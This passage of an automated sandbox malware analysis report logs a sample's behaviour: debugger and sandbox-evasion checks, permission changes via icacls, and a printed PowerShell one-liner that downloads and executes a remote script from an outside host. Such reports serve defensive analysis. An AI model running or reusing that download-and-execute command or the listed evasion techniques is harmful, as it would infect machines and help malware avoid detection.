        Source: powershell.exe, 00000006.00000002.1879594049.0000023580E7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterh`
        Source: powershell.exe, 00000006.00000002.1879594049.0000023580E7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterh`
        Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000006.00000002.1879594049.0000023580E7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterh`
        Source: powershell.exe, 00000006.00000002.1899444286.0000023590212000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
        Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
        Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000006.00000002.1908590862.00000235F09E8000.00000004.00000020.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1983100281.000000000301B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Hides threads from debuggers
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeThread information set: HideFromDebugger
        Tries to detect sandboxes and other dynamic analysis tools (window names)
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeOpen window title or class name: regmonclass
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeOpen window title or class name: gbdyllo
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeOpen window title or class name: procmon_window_class
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeOpen window title or class name: ollydbg
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeOpen window title or class name: filemonclass
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess queried: DebugObjectHandleJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess queried: DebugObjectHandle
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess queried: DebugPort
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: Process Memory Space: visionApps.exe PID: 8464, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: visionApps.exe PID: 8632, type: MEMORYSTR
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " iex (iwr https://saffplano.com/download/uploads/eERu1UrKpkUv.txt -UseBasicParsing).Content "Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Users\user\AppData\Roaming\App_86026 "/grant Everyone:F" /T /CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\App_86026\visionApps.exe "C:\Users\user\AppData\Roaming\App_86026\visionApps.exe" Jump to behavior
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager- Goog
        Source: visionApps.exe, 0000000A.00000002.2944884298.000000000465F000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNew Ta
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerTab - UH{Jo
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1F[HEJs
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerome.
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager Chrom
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNew Ta1H
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager?HaJ(
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager- GoogIHWJ
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNew TapHXJ-
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1B
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManageromeFfH*Jc
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerogle C.HrJo
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageromed
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager ChromBHNJ
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerogle C
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNew Tab - Google ChromerCache
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageromewn'HiJs
        Source: visionApps.exe, 0000000A.00000002.2944884298.000000000460B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program manager chromelication9750775403244
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerogle CmH3Jo
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000069A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerTab -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
